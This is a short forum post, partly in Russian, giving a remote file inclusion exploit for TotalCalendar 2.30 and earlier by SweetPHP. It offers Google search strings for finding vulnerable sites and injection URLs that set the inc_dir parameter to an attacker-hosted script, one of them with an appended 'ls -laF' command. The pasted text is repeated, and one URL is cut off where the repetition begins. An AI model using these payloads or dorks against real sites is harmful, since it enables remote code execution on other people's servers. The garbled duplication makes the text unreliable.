TotalCalender <=2.30 file inclusion
запрос google : allinurl:box_display.php?box=Week_View
injection :
=========
тоже самое тока в малец другом иполнении. )))
-----------------------------------------------------------------
Vendor: SweetPHP
URL: http://sweetphp.com
-----------------------------------------------------------------
Discovered by: 'Aesthetico'
http://www.majorsecurity.de
-----------------------------------------------------------------
Search for: "Powered by TotalCalendar"
-----------------------------------------------------------------
Exploitation:
запрос google : allinurl:box_display.php?box=Week_View
injection :
Код:
[path]/index.php?inc_dir=http://evil=========
тоже самое тока в малец другом иполнении. )))
-----------------------------------------------------------------
Vendor: SweetPHP
URL: http://sweetphp.com
-----------------------------------------------------------------
Discovered by: 'Aesthetico'
http://www.majorsecurity.de
-----------------------------------------------------------------
Search for: "Powered by TotalCalendar"
-----------------------------------------------------------------
Exploitation:
Код:
/index.php?inc_dir=http://www.yourspace.com/yourscript.php?
/index.php?inc_dir=http://www.yourspace.com/yourscript.txt?&ls%20-laF